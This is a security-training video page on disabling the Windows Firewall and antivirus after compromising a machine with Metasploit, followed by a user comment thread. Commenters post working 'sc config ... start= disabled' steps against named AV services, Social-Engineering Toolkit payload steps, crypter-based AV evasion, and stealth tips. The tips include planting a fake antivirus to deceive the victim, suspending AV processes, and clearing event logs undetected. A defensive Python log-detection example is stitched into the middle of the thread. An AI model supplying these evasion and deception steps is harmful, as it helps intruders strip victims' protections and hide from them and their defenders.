Description: This is Part 7 of the Security Metasploit Framework Expert (SMFE) course material. You can begin by watching Part 1 here: http://www.securitytube.net/video/2556. Enjoy! Certifications page: http://www.securitytube.net/cert-list
In this video, we will look at how to disable the Windows Firewall and kill the AV after breaking in. The interesting thing to note is that the default script to kill AV in Meterpreter, "Killav", fails against almost all of the latest AVs because it uses a simple exe image-name search and tries to kill the processes. However, as most AV manufacturers run a watchdog service which is typically unstoppable, this service restarts the AV processes again.
We will learn how to find the services which are running on the system, locate the AV services, change their configuration from the command line and then see how to kill them. Most of this video has little to do with Metasploit and more to do with how to "do a custom kill" :) After all, one cannot be as good as the tools he uses :) Tools are an aid, not a crutch.
Please do leave your comments behind!
Tags: kill, av, disable, firewall
That was fast :)
Great video
L0ve Y0u MaN...............
It's quite late in my country, but I really love watching your videos Vivek, and this one is very interesting!!
Nice video Vivek, I wonder if this technique will work with Microsoft Security Essentials?
Hi Chard,
I tested this with Microsoft Security Essentials...
It does work using the disable service method from Vivek's video. See customized command to disable the MS Security Essentials service.
Scenario: (As shown in video)
1. Start shell on victim's computer
2. Run "sc config msmpsvc start= disabled"
3. Reboot victim
Special Note:
This may not be the best solution if you're trying to be stealthy. After disabling MS Security Essentials the systray icon will turn red. This will notify the user that there's a problem.
Stealthy Alternative:
I've never tried this myself, but in order to be stealthy you could uninstall the AV and replace it with a fake systray icon or, better, a full-blown non-functional AV. Even with no programming experience you can probably build a simple application using screenshots from the real AV, Visual Studio and Google. This application would look real but not do anything.
Thanks,
@PoisonReverse - that's an interesting observation ... thank you.
When I get chance, I'll play around with Sophos AV to see if there's anything special about that (if so, and if I manage to deal with it). In the meantime, maybe others can look at AV to which they have access and report in this thread. I'm sure that the ST community can prove how important such collaboration is!
@vivek thanks really really nice tutorial. It's just that during the exploit process using metasploit if an AV is running it detects the payload and stops it from running. That's an issue I'm facing.
Great as usual.
For tasks and services it is easier (for me) to do:
Start -> left click on "My Computer" -> Manage. Quicker, all in one window.
Dear j0k3rr,
I ran into the same issue when I started learning about this stuff. There are alternative ways of encoding a payload which will bypass most AV. Try researching Shellcodes, VBS encoding and FUD Crypters.
Here's an example of a Shellcode payload hosted on a webserver. Created using the Social Engineering Toolkit.
1. Start BT
2. Start terminal
3. type "cd /pentest/exploits/set" enter
4. type "./set"
5. 1 (Social) -> 2 (Website) -> 1 (Java) -> 2 (Cloner) www.google.com -> 13 (Shellcode)
I highly recommend analyzing what S.E.T. is doing in the background. Try recreating the same attack using the Metasploit Framework alone.
Thanks,
Dear dge,
The reason Vivek was showing us how to disable a service using the command prompt is because an attacker may not have access to the victim's mouse and keyboard.
When exploiting a vulnerability the first step is often to obtain a shell on the remote machine. Once that's done you can install backdoors or remote administration tools.
I hope this clarifies why in this scenario you wouldn't use "Computer Management".
Awesome as always!
Hi PoisonReverse, can you suggest some books, study material or any useful links regarding encoding and shellcode, because I am also facing the problem of being detected by AV.
Thanks
PoisonReverse has all the answers already :) AV evasion is not a topic which can be isolated to the realm of pure Metasploit usage. Also, to truly evade AVs you might need to encode, encrypt, be polymorphic etc. Still there is no certainty you would have a "universal AV evasion" technique. Even if you get one, it will not last for long as soon as you disclose it :)
I will briefly talk about encoding and packing with metasploit for AV evasion in later videos. If time permits, I might also discuss how to write a custom encoder.
The next video is available now:
http://www.securitytube.net/video/2672
We will look at the concepts of Windows desktops and other interesting things in this one.
@PoisonReverse Would it be possible for you to make a quick video for MS Security Essentials? It would be a nice addition to the course :)
mister PoisonReverse,
Thanks for your reply.
Sorry, certainly a mistake from me. I said that for when Mr. Ramachandran was showing how to verify that services are disabled on the victim machine, or where the logs are at the end of the video. That was for not making a lot of clicks when you want to verify. Excuse me for my bad English too (French speaker). A nice day to everyone.
@Vivek - I really hope you get chance to create a video dealing with how to write a custom encoder. I realise that it might not remain functional for long, but it would be a scaffold upon which other encoding ideas could be developed.
Hi Vivek,
I have a problem executing the exploit when the firewall is on, because of a timeout error; I can't even ping the Windows system. But in your video the firewall is on and after executing the exploit you are disabling the firewall. Please tell me how to do it.
Thanks
Hi Vivek
As neo_panky said, I am also facing the same issue; please throw some light on it.
Hi
Thank you so much. I am a newbie with Metasploit and I am wondering why this "exploit(ms08_067_netapi) > exploit" doesn't work for me; I mean msf shows me "unknown command...". Can anyone tell me please how I can reach Meterpreter? Thanks
@Vivek great videos, and I have watched the last 6 videos successively till now. I have two questions:
1. Why doesn't the AV detect the Metasploit payload used?
2. Can I avoid the pop-up when I disable the firewall?
Thank you for the great videos
Hi everyone, Thank you very much Vivek for all the tutorials you make available to the community.
I have one question. Why did you execute this command "execute -f cmd.exe -c -H" instead of "shell" in Meterpreter to get a command prompt? Does it give the same result?
Probably too late in the thread for most people to see, but you might all be interested to know that you can easily suspend the AV process instead of killing it.
I only tried it locally, but it worked great with Security Essentials, and probably other AVs as well. The watchdog (or similar) service won't restart a suspended process. And the best thing? The tray icon even stays on (but you can't click it)!
I used pssuspend from the Sysinternals suite. Of course you have to somehow get the executable to the remote machine before using it.
The exploit was not working when the firewall was on. When I turned off the firewall it was working fine. Can anybody please explain this mystery to me?
Thanks for the awesome videos! I was running Windows XP Home as my lab PC so it didn't have Tasklist or Taskkill. You can download the taskkill from http://web.archive.org/web/20070125030456/http://home.wanadoo.nl/gigajosh/files/taskkill_en.zip and tasklist from http://www.computerhope.com/download/winxp.htm
Afterwards I just used terminal to unzip the .zip file. Then I used meterpreter ls and cd to work my way into System32, after which I used the upload command for both of the files.
Whoops, I hit reply by accident. Anyway, it ended up working in the Windows shell :) Keep up the awesome work on the videos!
Best site I have ever seen.
Thanks Vivek
Quick question Vivek, what SP are you running Windows XP here? SP2? Thanks for these videos and the assembly videos. Love em.
Hi Vivek, I could not connect to Meterpreter. What do I do? Please give me some idea about that. Please find my commands below and see whether they are correct or not:
use exploit/windows/smb/ms08_067_netapi
use LHOST (My IP)
use RHOST ( Target system IP)
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
And I'm using Windows XP 2 OS only...
Can you please clear my silly doubt:
how can you get in successfully (Meterpreter) to the target while the firewall is on?
Thanks
Great video, except for one thing.
When you clear the event logs, it leaves behind a Success Audit security log indicating that the logs were cleared. Isn't this suspicious? Is there a way to clear the logs without leaving this behind?
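The question above about the audit entry left behind when the logs are cleared is the defender's side of this whole thread: setting an AV service to disabled, stopping the firewall service and clearing the event logs each leave records that can be alerted on. The following added example (not code from the video or from anyone in this thread) scans constructed Windows event records for exactly those traces. The event IDs are real Service Control Manager and Security log IDs; the log lines, the display names in them and the keyword list used to recognise protective services are assumptions made up for this example.

```python
"""Flag service tampering and audit-log clearing in exported Windows event records.

Added example for this thread, not part of the video. Event IDs are real;
the sample records, display names and keyword list are constructed here.
"""
import re
from typing import List, Optional, Tuple

# Real Windows event IDs:
SERVICE_START_TYPE_CHANGED = 7040  # System log, Service Control Manager: start type changed
SERVICE_STATE_CHANGED = 7036       # System log, Service Control Manager: service entered a state
AUDIT_LOG_CLEARED = {517, 1102}    # Security log: 517 on XP/2003, 1102 on Vista and later

# Assumed keywords for recognising protective services by display name;
# covers the AV products and the firewall service discussed in the thread.
# Tune this per environment.
WATCHED_KEYWORDS = ("antimalware", "antivirus", "avg", "avast", "firewall")

START_TYPE_RE = re.compile(r"The start type of the (.+?) service was changed from (.+?) to (.+?)\.$")
STATE_RE = re.compile(r"The (.+?) service entered the (\w+) state\.$")

# Constructed sample export in the form "log,event_id,source,message".
SAMPLE_LOG = """\
System,7036,Service Control Manager,The Print Spooler service entered the running state.
System,7040,Service Control Manager,The start type of the Microsoft Antimalware Service service was changed from auto start to disabled.
System,7036,Service Control Manager,The Microsoft Antimalware Service service entered the stopped state.
System,7040,Service Control Manager,The start type of the Print Spooler service was changed from auto start to demand start.
System,7036,Service Control Manager,The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state.
Security,517,Security,The audit log was cleared.
"""

Alert = Tuple[str, str, str]  # (severity, summary, original message)


def is_watched(display_name: str) -> bool:
    """True if the service display name matches one of the assumed keywords."""
    name = display_name.lower()
    return any(keyword in name for keyword in WATCHED_KEYWORDS)


def parse_line(line: str) -> Tuple[str, int, str]:
    """Split one 'log,event_id,source,message' record; the message may contain commas."""
    log, event_id, _source, message = line.split(",", 3)
    return log.strip(), int(event_id), message.strip()


def classify(log: str, event_id: int, message: str) -> Optional[Alert]:
    """Return an alert for a suspicious record, or None for benign noise."""
    if log == "Security" and event_id in AUDIT_LOG_CLEARED:
        # Clearing the log cannot remove this record: it is written after the clear.
        return ("HIGH", "audit log cleared", message)
    if log == "System" and event_id == SERVICE_START_TYPE_CHANGED:
        m = START_TYPE_RE.match(message)
        if m and is_watched(m.group(1)) and m.group(3).lower() == "disabled":
            # This is what "sc config <svc> start= disabled" leaves behind.
            return ("HIGH", f"protective service set to disabled: {m.group(1)}", message)
    if log == "System" and event_id == SERVICE_STATE_CHANGED:
        m = STATE_RE.match(message)
        if m and is_watched(m.group(1)) and m.group(2).lower() == "stopped":
            return ("MEDIUM", f"protective service stopped: {m.group(1)}", message)
    return None


def scan(records: str) -> List[Alert]:
    """Run classify() over every non-empty record and collect the alerts in order."""
    alerts: List[Alert] = []
    for line in records.splitlines():
        if not line.strip():
            continue
        alert = classify(*parse_line(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for severity, summary, message in scan(SAMPLE_LOG):
        print(f"[{severity}] {summary}  <-  {message}")
```

Two caveats a defender should keep in mind. First, the event IDs are the same whether the change was made through `sc config`, Computer Management or the AV's own installer, so the alert is a starting point for triage, not proof of compromise on its own. Second, suspending the AV process (the pssuspend approach mentioned later in this thread) changes neither the service configuration nor the service state, so it produces none of the records above; catching that requires checking the process state itself rather than the event log.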
Brilliant idea about disabling the service watchdog. So there is a catch anyway for AVG 2012!! Thank you Vivek, awesome video!
Hi Vivek,
I downloaded AVG 2013 and tried to disable the avgwd service but it gives me "Access is denied".
What can be the reason?
C:\WINDOWS\system32>sc config avgwd start= disabled
sc config avgwd start= disabled
[SC] ChangeServiceConfig FAILED 5:
Access is denied.
Nice video. You are good at explaining things in an understandable way. Is it possible to alter the antivirus exceptions through the command prompt also (for example after the AV is killed)?
Thanks Vivek, your tutorial was really, really, extremely great...
I have a question, friends.
When I try to use the same strategy against Avast antivirus, killing AvastSvc.exe, it did not work; it tells me that I should update some key in the registry.
Any ideas????
Hi Vivek,
I tried to disable the AV service AVGIDSAgent and I get "[SC] ChangeServiceConfig FAILED 5:"
Why?
C:\WINDOWS\system32>sc config AVGIDSAgent start= disabled
sc config AVGIDSAgent start= disabled
[SC] ChangeServiceConfig FAILED 5:
Access is denied.
Thanks very much Vivek.
I have a problem with Avast: I cannot disable it.
The Avast version is 8 and I have tried these steps but I could not do it.
Please help me...
Please
Thanks
I am waiting for a response...